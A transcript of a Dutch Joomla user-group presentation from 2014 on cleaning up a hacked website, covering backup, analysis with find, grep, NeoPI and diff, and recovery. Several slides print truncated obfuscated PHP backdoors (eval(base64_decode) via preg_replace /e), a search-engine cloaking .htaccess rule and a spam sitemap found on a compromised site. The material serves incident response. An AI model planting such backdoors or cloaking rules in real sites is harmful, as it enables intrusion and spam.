Help mijn website is gehackt - Joomla User Group Den Bosch 2014
-
Upload
peter-martin -
Category
Technology
-
view
351 -
download
2
description
Transcript of Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Help mijn siteis gehackt... wat nu?
door Peter Martin www.db8.nl / @pe7er
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
1.Waarom hacken?
2.Website gehackt
3.SSH connectie
4.Procedure– Backup
– Analyse
– Herstel
Website gehackt
Waarom hacken?
1. Credit Cards
2. Informatie
3. Graffiti
4. Phishing
5. SPAM
6. Backlinks
7. DDOS
8. CPU
9. Handel
Website gehackt
Website gehackt 1
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Website gehackt 1
Klant
Hosting Provider
opencoffeewebsite
is gehackt
?!?!Andere sites,
zelfde IP ook!?!
(laconiek) gewoonindex.php
terugzetten
Hierbij zeg ik mijn hosting op, asap!
Website gehackt 2
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Website gehackt 2
Klant website
Fabrik
?!?!from: @ .brto: @ .br !?!
E-mail bouncedpaar dagen
Spam script, tijdstipin access log
Front-end upload:Bestandsformaatniet toegestaan!
Website gehackt 3
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Website gehackt 3
Klant
SSH op website
Backup,(just in case)
?!?! verschil groottevorige backup?
Verdachte phpbestanden &
viagra sitemap.xml
Ik admintoegang opwebsite?
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backdoor 1
/includes/xmlrpc.php - 07 september 2014 23:15:01<?php# GNU LESSER GENERAL PUBLIC LICENSE# Version 3, 29 June 2007# # Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> # Everyone is permitted to copy and distribute verbatim copies# of this license document, but changing it is not allowed. [..]## You should have received a copy of the GNU General Public License# along with this program. If not, see <http://www.gnu.org/licenses/>$auth_pass = "52fd812f55cb3118bb3bfe575b59a02d";$color = "#df5";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66 \x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPUNGlm4brIMGOJxk+lmTaNhB6mh8YMMN0R+4n12YWIOcDP7+WdWHPWeZ9JbUIuKQiOMF9DmyBsoDeXKainkKVZckRWLJswvDNX+/TdbCpKtpOhLRlT0A3BB5Hv+DOYpDAF8FT+8+dA5Pi1Xy+slap8xc8dGiRV8XHBM+DBh3nqhI1PG7g2kFEKr73RGsGBAGk3LAU7LOFVMnZUErsT4TA+ciR9E7nhAs6/Qc0MLlqWOHOtQw5fJRbyFoQ
Niet in backup van 18 oktober 2014 !
Gehackt op 19 oktober 2014
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Payload 1
.htaccess - 09 november 11:45:48RewriteEngine OnRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|spaumbot) [OR]RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]
### @package Joomla# @copyright Copyright (C) 2005 2014 Open Source Matters. All rights reserved.# @license GNU General Public License version 2 or later; see LICENSE.txt##
Toegevoegd
Hack via backdoor door 2e hacker
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Payload 2
main.php - 10 juli 2013 11:25:27<?php Error_Reporting(0); $xTBYAB76GYfo="rRgNb9pINsmlkm88FKyALcceuFM36xyYbdASOBpMe4FEhCapvQV74nL1b0il/v97b8Y2BkKSSudIwZ55X/O+5/38EUW9Pm96w07Tu3B//vAIMYjTZIpBqKY3/Gkw/vlDq3N/6bS85h9e811y5rqnThu+nMFHr+cmJ5PreNTqeW4c8L/9/PHzB4dnqZK3FZXyK/7vDcyzfgtwxptgKiXUqBplRvx0ETk/4nu9qkoAhzClalrMj8vlchjP43j+NGzNvvPTL7GDm0rNso2aqemwn6jMKhG2sEzdtDVTXygVk9RMaz+0jFoiaCnEsJiqGgTBbV21DJ0yna4AVEbeMuLYhgSpUKpcRlESrjDDJFKpSWhJiQCLGbqj1nRyf38fKhVFEimRqqOzMhBYoUn2Jq2kOy9TkaIUpFCNqkmO2H6oMxrpBrXVqMHosamyLWRpXU1VGfWXVFECYcQlrSkoAgoGi2NcUZR9hspNXER8w1lVZQjLkUC9pFtUA+HYnqZS1U/UfdUBng5lNcWxNZJsEd6E8NFUvEC3AOvDvm7WmO84o07Xc5xAAoMc6HEoAVCh+[..]+jPuv0ZCSPco4yHZS4goVte05ZaSQG+kdELd9Sz2YzKa3nwIRHiW9qulHKSSXNiggPBGFb0SQPUZPP4iNUBuLj2JSJG6RItv9Dw==";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doeVRXeEdkbHByYkRSVV[..]
Hack via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
preg_replace("/.*/e","eval(base64_decode('
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Payload 3
sitemap.xml - 9 november 2014 11:50:42<?xml version="1.0" encoding="UTF8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://www.voorbeeld.nl/viagraprofessional100mg/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.voorbeeld.nl/longtermsideeffectsofcialis/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.voorbeeld.nl/priceofviagra100mgtablet/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url></urlset>
Hack via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
590 spam links
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backdoor 2
/libraries/joomla/session/cache.php 19 augustus 2013 14:45:46 <?php Error_Reporting(0); $x0bp6Rx0vRH="vRhrb9s28K+71VLHDtCsfmRTggC2GUOijFo1LWlA3CY/oAX6F0ZDZWWlk5ols9MmLnZHUrLkR5btw5w4Eo/34r2Z9x8Mz6Oe2SIB9Zhrd5N5unz/4f2HqU+8N8Qzx/A0rS6xmbgXL6Zm22j9bLRO+ctG48hswsqsPjP2G/xEUrkdkXwOPNI1BxbrDxM+84nTOaNs5vJYbPJMU/FOSutS2nUIiKhU620j51Vi9UziALPzrm9d9T1r5BDvvNrzf6LsSm2eH5CeawWWx2zi+ec5xdUBPXNhe8hYcI4c/MDtAbFm8qh2K92YNyag2kRqHIxZx5XgRqupNJ52CXNc+7UPQE5tDsDpgPZwNecSQ8Bn2nO9e+a5g8RnnumRwLH6JOGj0SjiMefxmo1f1tpg3WgFbRm/NI12w2y2DvlJit7KuQ56Nwm+IPAj/E4Diw2VrF30GbnElPT4phnIHd97M/S3eV9ptlxHg1Mx6tAR8RINlNzwveP4CiE/dojHDuMwjLfjSo3UKgqvnFArhrHh+j5hyZQFgfYTGwSoO1AhEI0Pj0sivdFA+08EcXyCuAIZdMZ2n7nUNsmF6zM/4f6lb4ILTUYGgQlm5BuM1zESab8C3wJuAvu2NSCJaVYO64ZpKl9NdAC5neSz60smGVEUzsIoP+0sBPHIdPAakMROrHh+fX2dZnu0mucJwFJtpXWW1AkIoFOCpcYzyW8OKhuUr9if4Dv38D";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXN
via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
preg_replace("/.*/e","eval(base64_decode('
Aangepast!
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backdoor 3
/administrator/fs-login.phtml - 09 november 2014 11:45:48<?php Error_Reporting(0);$xJdU8NfauOq="5b1rdxrH0igs2Y4kHxzLkmXLlix7EGQmWsuKGcjAwDDR79gfvJftABLYRuzMaIIQxH/9VFXf54KQk/0871kve8eC7urq6lt1dVV19cQrW91S1XOceBgnn+rNVvNL89PXL+f93z987Xsf67Xfvw4+1Qet8+bvNTe5/Ne/J63AD2yE/rNW/0gpNbfulX2r5LWsMOhAVlR3er3fIz2v7Lgl7zfvLeRadtnVs1pdz3ZcC8vdDzu1oOJc9wcf+1j8X/8O6/Mrt121TueT0ubOxr2dje3o1drag9I6/Co9e7pzsBY9XCzid//6dwyfCdRjP2u4HQsb5Nm2dzpPngZBw3eTaZxs+mW7il9ebh48Dyz8Fnolz251w2PXxp8/ep2a+xa/bXjtpg+Ji0uGGiip2m6j1PasVnce3UTxLA7bVT+oufPo52iq172AvOgmxMRVqMZP1/Vqrj0nsJv+rBd/6H2IDwIr3g3KnVokqMCP+za0+M+Tf/37BLtpL+yEJejEeeTadmCX/KARTQ/WX7zAcioTkksE4ETTnpnV9t6W3Lduq4xjWLLCtitAIJt+l/ywHVpzldj2GmGr9FM5sFynZJc7CMSzYWzDDvTL/c3DErR+8+jwADojGsw+UktoXBtpFI1qa8465X293GGTCRA4lh1WHd9zuq4zn9CYMqD3tmuV7U4cOiU20iLzMxt5wF4lEnQMOCYcbBznoQby3kOfvp+UHhxursEsypBAGWJAJqX9w8M3Rzu5gCwLQWmUZKsqTvAiaISdOWtILXTnyQXMrtjzw0Zn2II55Nqji3pgt+O2a3WD2rAaONboASzUSmDXxvFF2KmWrdg6rbrDKk+NO16b/Rrp2U65CeMWH3t+2R1Go1E0urhBzPAHqhwlWfKwIa7VCoIzIGxyBj12rFYYb9T25OwhtHlyzPshU0Bg1VawZDZq6kNu6OAEZL26HWE2rI34jz/iebv2MZM+hDo1PGpVGESzksbSewVoAMFUL05TkZERz68EIbyBxTiAjJ9/jleCjK+K6FVzQOspmD8W8NcKcAIYNvg1f/DqQelwc9qbni+o8Ukl7CQLnJ8BsrgIfiKndH3HVYmd8C1jnxPHq7ulNvAoSKb [..]N1BmC06baOOvUABzLnQQOPayaWUZNuVsvz/RKeu0tYqggU6iMX1/8L";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNj
via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
preg_replace("/.*/e","eval(base64_decode('
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backdoor 4-9
Toegevoegd op 09 november 2014 11:45:48
/language/comnon.phtml /layouts/fedit.php /libraries/fedit.php/logs/comnon.php/plugins/fs-login.phtml/tmp/Iicense.php
bevat:
<?php Error_Reporting(0);
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28
via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
Gevolg
SSH connectie
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Terminal
Text Terminal
“TTY” TeleTYpewriter
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Terminal
Windows– SSH programma: PuTTY
Mac OSX– Ingebouwd: “Terminal”
Linux– Ingebouwde Terminal Emulator
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
SSH
Secure SHell
gebruikt public-key cryptografie (authenticatie & veilige data communicatie)
peter@computer:~$ ssh [email protected]
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
SSH
peter@computer:~$ ssh [email protected]
The authenticity of host 'example.com (93.184.216.119)' can't be established.RSA key fingerprint is 10:51:ab:f5:d7:[..]:17:16:1f:22:33.Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'example.com,93.184.216.119' (RSA) to the list of known [email protected]'s password:
Procedure
Backup
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backup files
Backup van voor de hack?– Hosting partij?
– Akeeba backup (offline)?
Maak backup van huidige situatie (inclusief hack!)– Akeeba backup
– Rsync / MySQL dump
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
rsync
Remote synchronization– rsync van “bron” naar “doel”
$ rsync -arv [email protected]:~/joomla-cms/ /var/www/joomla-cms-backup/
gebruikersnaam@ server : folder
gebruikersnaam@ server : folder
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
MySQL Dump
MySQL Dump
$ mysqldump -u gebruikersnaam -p databasenaam > bestand-met-sql-uitvoer.txt
Analyse
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Analyse
● Software versies:– CMS (Joomla versie?)
– Versies 3rd party extensies?
● Access Logfiles– Vreemde POST requests?
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Analyse
● Nieuwe bestanden op server– .php files in /images/ map?
● Bestanden met vreemde code– Base64 decode
● Vergelijk bestanden met originele bestanden– diff
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Nieuwe bestanden
Aangemaakt in de laatste 7 dagen:
find . -type f -ctime -7
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Recent gewijzigd
Gewijzigd tussen 7 en 3 dagen geleden:
find . -type f -mtime -7 ! -mtime -3
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
grep
● Zoek naar specifieke teksten
grep -r "eval" /var/www/joomla-cms | grep "base64_decode"
● Of
grep -r "preg_replace" /var/www/joomla-cms | grep "\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28"
grep -r "eval" /var/www/joomla-cms | grep "<?php Error_Reporting(0);”
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
NeoPi
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
NeoPi
Detectie van verborgen web shell codeBenodigd Python 2.6
Installeer via git:
$ git clone https://github.com/Neohapsis/NeoPI.git
Start script:
$ /var/www/NeoPI/neopi.py -Aa /var/www/joomla-cms
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
diff
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
diff
Vergelijk bestanden van website met originele bestanden:
– Zorg voor map met originele Joomla + extensies● Oude backup of● Nieuwe installatie Joomla + extensies
– Zorg voor map met gehackte website
Gebruik diff software om te vergelijken:
– Linux + OSX: Meld
– Windows: WinMerge
Herstel
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Herstel
● Verwijderen alle hacker scripts– Kijk verder dan “hack” ivm backdoor scripts
● Alle software up-to-date brengen– Joomla
– 3rd party extensions
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Herstel
● Wachtwoorden vervangen– MySQL database wachtwoord
– FTP wachtwoord
– Wachtwoorden van Joomla gebruikers
● Evt extra controle:– Backup schoon gemaakte website
vergelijken met nieuwe Joomla installatie → diff
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Herstel
● Eigen .xml sitemap aanmelden bij Google
● Spam pagina's sneller uit zoekmachines?
"410 Gone error" via .htaccess:
RewriteRule \S*viagra+\S* [G]RewriteRule \S*cialis+\S* [G]RewriteRule \S*pharmacy+\S* [G]RewriteRule \S*propecia+\S* [G]RewriteRule \S*drugs+\S* [G]
Conclusie
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
1.Waarom?
2.Website gehackt
3.SSH connectie
4.Procedure– Backup
– Analyse
– Herstel
Conclusie
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Vragen?
Peter Martin
e-mail: info at db8.nl
website: www.db8.nl
twitter: @pe7er
Presentatie: http://www.db8.nl
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Used PhotosTitel sheet:
Guy Fawkes Mask - Ben Fredericson, 2009http://commons.wikimedia.org/wiki/File:Guy_Fawkes_Mask.jpg
1. Waarom hacken?Question mark (3534516458) - Marco Bellucci, 2005http://commons.wikimedia.org/wiki/File:Question_mark_(3534516458).jpg
Credit-cards - Lotus Head, 2005 http://commons.wikimedia.org/wiki/File:Credit-cards.jpg
Pickpocket girl - Lunch Photography, 2008 http://commons.wikimedia.org/wiki/File:Pickpocket_girl.jpg
Graffiti-Sokolov5 - Orange.man, 2008 http://commons.wikimedia.org/wiki/File:Graffiti-Sokolov5.JPG
Phishing - Stomchak, 2010 http://commons.wikimedia.org/wiki/File:Phishing.JPG
Spam 2 - Bodo Akdeniz, 2005 http://commons.wikimedia.org/wiki/File:Spam_2.jpg
Plugboard wires - Daniel Sancho, 2005http://commons.wikimedia.org/wiki/File:Plugboard_wires.ds.jpg
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Used PhotosWAC telephone operators operate the Victory switchboard during the Potsdam Conference in their headquarters in - U.S. National Archives and Records Administration, 1945http://commons.wikimedia.org/wiki/File:WAC_telephone_operators_operate_the_Victory_switchboard_during_the_Potsdam_Conference_in_their_headquarters_in..._-_NARA_-_199007.jpg
Butterfly Labs Bitcoin miner - arstechnica.com, 2013http://cdn.arstechnica.net/wp-content/uploads/2013/05/IMG_6048-Version-3.jpg
Cirencester, market place - Tony Grist, 2008http://commons.wikimedia.org/wiki/File:Cirencester,_market_place.jpg
2. Hacked
Youve-been-hacked, Hanonen, 2014http://commons.wikimedia.org/wiki/File:Youve-been-hacked.jpg
Piedbiche - Isabelle Grosjean, 2001http://commons.wikimedia.org/wiki/File:Piedbiche.jpg
3. SSH connectie
Switchboard Manual - Peel Conner, Geez-oz, 2012http://commons.wikimedia.org/wiki/File:Switchboard_Manual_-_Peel_Conner.JPG
Bundesarchiv Bild 183-2008-0516-500, Fernschreibmaschine mit Telefonanschluss - Illger, Willi, 1930http://commons.wikimedia.org/wiki/File:Bundesarchiv_Bild_183-2008-0516-500,_Fernschreibmaschine_mit_Telefonanschluss.jpg
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Used Photos4. Procedure
Motorola M6800 manuals - Michael Holley, 2010http://commons.wikimedia.org/wiki/File:Motorola_M6800_manuals.jpg
BackupIBM 7330 on white background, Crisco 1492, 2013http://commons.wikimedia.org/wiki/File:IBM_7330_on_white_background.jpg
AnalysePostcards and magnifying glass, Anna, 2007http://commons.wikimedia.org/wiki/File:Postcards_and_magnifying_glass.jpg
Magnifying glass on antique table - Stéphane Magnenat, 2008http://commons.wikimedia.org/wiki/File:Magnifying_glass_on_antique_table.jpg
Magnifying glass - Faberge - shakko, 2011http://commons.wikimedia.org/wiki/File:Magnifying_glass_-_Faberge.jpg
Binary Code, Cncplayer, 2013http://commons.wikimedia.org/wiki/File:Binary_Code.jpg
Two different shoes on, Kelly Bailey, 2007http://commons.wikimedia.org/wiki/File:Two_different_shoes_on.jpg
HerstelIBM 650 at Texas A&M open for repair - Cushing Memorial Library and Archives, Texas A&M, 2009http://commons.wikimedia.org/wiki/File:IBM_650_at_Texas_A%26M_open_for_repair.jpg
Conclusie
EquinoxeJuniorHighPac-Man - Equinoxe, 2012http://www.c64-wiki.com/index.php/File:EquinoxeJuniorHighPac-Man.png